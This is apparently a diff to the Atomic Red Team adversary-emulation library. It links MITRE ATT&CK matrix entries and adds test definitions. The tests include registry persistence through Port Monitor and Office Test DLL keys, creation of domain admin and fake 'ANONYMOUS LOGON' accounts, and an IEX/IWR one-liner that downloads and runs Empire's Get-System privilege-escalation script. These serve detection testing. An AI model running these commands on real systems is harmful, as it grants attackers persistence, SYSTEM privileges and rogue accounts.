 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -82,7 +82,7 @@
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
 |  |  | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) |  |  |  |  |  |  |  |
-|  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
+|  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
 |  |  | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) |  |  |  |  |  |  |  |
 |  |  | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -120,14 +120,14 @@
 |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) |  |  |  |  |  |  |  |
-|  |  |  |  | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [System Checks](../../T1497.001/T1497.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Timestomp](../../T1070.006/T1070.006.md) |  |  |  |  |  |  |  |
-|  |  |  |  | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -21,12 +21,12 @@
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) |  | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  |  | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -41,7 +41,7 @@
 |  |  | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | [Office Test](../../T1137.002/T1137.002.md) | [Port Monitors](../../T1547.010/T1547.010.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
@@ -50,16 +50,16 @@
 |  |  | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) |  |  |  |  |  |  |  |
 |  |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
+|  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) |  |  |  |  |  |  |  |
-|  |  | [Security Support Provider](../../T1547.005/T1547.005.md) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) |  |  |  |  |  |  |  |
+|  |  | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) |  |  |  |  |  |  |  |
 |  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
@@ -96,14 +96,14 @@
 |  |  |  |  | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [System Checks](../../T1497.001/T1497.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Timestomp](../../T1070.006/T1070.006.md) |  |  |  |  |  |  |  |
-|  |  |  |  | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -5109,7 +5109,31 @@ privilege-escalation:
       - Travis Smith, Tripwire
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1547.010
+    atomic_tests:
+    - name: Add Port Monitor persistence in Registry
+      auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50
+      description: Add key-value pair to a Windows Port Monitor registry. On the subsequent
+        reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.
+      supported_platforms:
+      - windows
+      input_arguments:
+        monitor_dll:
+          description: Addition to port monitor registry key. Normally refers to a
+            DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions
+            allow writing a fully-qualified pathname for that DLL.
+          type: Path
+          default: C:\Path\AtomicRedTeam.dll
+      executor:
+        command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
+          /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
+
+'
+        cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
+
+'
+        name: command_prompt
+        elevation_required: true
   T1055.002:
     technique:
       external_references:
@@ -7582,7 +7606,34 @@ privilege-escalation:
       - File system access controls
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1134.001
+    atomic_tests:
+    - name: Named pipe client impersonation
+      auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
+      description: |-
+        Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
+        When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+
+        Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+      supported_platforms:
+      - windows
+      executor:
+        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1');
+          Get-System -Technique NamedPipe -Verbose
+        name: powershell
+        elevation_required: true
+    - name: "`SeDebugPrivilege` token duplication"
+      auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
+      description: |-
+        Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
+        When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+      supported_platforms:
+      - windows
+      executor:
+        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1');
+          Get-System -Technique Token -Verbose
+        name: powershell
+        elevation_required: true
   T1546.005:
     technique:
       external_references:
@@ -11084,7 +11135,62 @@ persistence:
       - Administrator
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1136.002
+    atomic_tests:
+    - name: Create a new Windows domain admin user
+      auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
+      description: 'Creates a new domain admin user in a command prompt.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        username:
+          description: Username of the user to create
+          type: String
+          default: T1136.002_Admin
+        password:
+          description: Password of the user to create
+          type: String
+          default: T1136_pass123!
+        group:
+          description: Domain administrator group to which add the user to
+          type: String
+          default: Domain Admins
+      executor:
+        command: |
+          net user "#{username}" "#{password}" /add /domain
+          net group "#{group}" "#{username}" /add /domain
+        cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+
+'
+        name: command_prompt
+        elevation_required: false
+    - name: Create a new account similar to ANONYMOUS LOGON
+      auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
+      description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        username:
+          description: Username of the user to create
+          type: String
+          default: ANONYMOUS  LOGON
+        password:
+          description: Password of the user to create
+          type: String
+          default: T1136_pass123!
+      executor:
+        command: 'net user "#{username}" "#{password}" /add /domain
+
+'
+        cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+
+'
+        name: command_prompt
+        elevation_required: false
   T1078.002:
     technique:
       created: '2020-03-13T20:21:54.758Z'
@@ -13244,7 +13350,30 @@ persistence:
       x_mitre_platforms:
       - Windows
       - Office 365
-    atomic_tests: []
+      identifier: T1137.002
+    atomic_tests:
+    - name: Office Apllication Startup Test Persistence
+      auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563
+      description: |
+        Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office
+        application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives.
+      supported_platforms:
+      - windows
+      input_arguments:
+        thing_to_execute:
+          description: Thing to Run
+          type: Path
+          default: C:\Path\AtomicRedTeam.dll
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
+          /t REG_SZ /d "#{thing_to_execute}"
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office
+          test\Special\Perf"
+
+'
+        name: command_prompt
   T1137.003:
     technique:
       external_references:
@@ -13931,7 +14060,31 @@ persistence:
       - Travis Smith, Tripwire
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1547.010
+    atomic_tests:
+    - name: Add Port Monitor persistence in Registry
+      auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50
+      description: Add key-value pair to a Windows Port Monitor registry. On the subsequent
+        reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.
+      supported_platforms:
+      - windows
+      input_arguments:
+        monitor_dll:
+          description: Addition to port monitor registry key. Normally refers to a
+            DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions
+            allow writing a fully-qualified pathname for that DLL.
+          type: Path
+          default: C:\Path\AtomicRedTeam.dll
+      executor:
+        command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
+          /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
+
+'
+        cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
+
+'
+        name: command_prompt
+        elevation_required: true
   T1546.013:
     technique:
       external_references:
@@ -24054,7 +24207,36 @@ defense-evasion:
       x_mitre_data_sources:
       - API monitoring
       x_mitre_version: '2.0'
-    atomic_tests: []
+      identifier: T1006
+    atomic_tests:
